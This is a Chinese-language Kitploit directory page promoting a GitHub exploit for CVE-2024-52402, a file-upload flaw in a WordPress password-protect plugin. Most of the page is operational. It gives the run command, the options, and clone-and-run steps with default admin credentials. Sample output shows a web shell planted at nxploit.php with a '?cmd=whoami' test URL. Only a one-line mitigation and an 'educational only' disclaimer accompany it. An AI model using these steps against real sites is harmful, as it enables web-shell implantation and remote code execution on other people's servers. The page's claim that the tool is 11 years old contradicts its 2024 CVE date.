Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-52402 — WordPress Exclusive Content Password Protect 插件 <= 1.1.0 - CSRF 到任意文件上传漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-52402
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubnxploited/cve-2024-52402

CVE-2024-52402

WordPress Exclusive Content Password Protect 插件 <= 1.1.0 - CSRF 到任意文件上传漏洞

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 CVE-2024-52402 漏洞利用:WordPress Exclusive Content Password Protect 插件 <= 1.1.0

🛡️ 概述

该漏洞利用针对 WordPress Exclusive Content Password Protect 插件版本 1.1.0 及更早版本中的跨站请求伪造(CSRF)漏洞。该漏洞允许攻击者向 Web 服务器上传 Web Shell,从而可能导致远程代码执行。

📅 详细信息

  • 发布时间: 2024-11-19
  • CVE ID: CVE-2024-52402
  • 插件版本: Exclusive Content Password Protect <= 1.1.0
  • 严重性: 严重(CVSS 9.6)

⚙️ 使用方法

要利用此漏洞,您需要提供目标 WordPress 站点的 URL、有效的 WordPress 用户名和密码。该漏洞利用脚本将登录 WordPress 站点并尝试上传 Web Shell。

🔧 命令

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ 选项

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 示例

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 输出示例

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 描述

该脚本利用 Exclusive Content Password Protect 插件中的 CSRF 漏洞上传 Web Shell 到 WordPress 服务器。然而,它不会直接执行 CSRF 攻击 ;相反,它专注于利用插件的文件上传 功能来实现漏洞利用。

👨‍💻 如何运行脚本

  1. 克隆仓库

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. 安装依赖 确保您已安装 requests 库:

    root@kitploit:~
    pip install requests
    
  3. 运行脚本 使用以下命令执行脚本:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ 缓解措施

为缓解此漏洞,请将 Exclusive Content Password Protect 插件更新到已修复该问题的最新版本。

⚠️ 免责声明

此脚本仅供教育目的使用。未经授权对您没有明确测试权限的系统使用此脚本是非法且不道德的。

漏洞利用作者:Nxploit , Khaled alenazi.

下载工具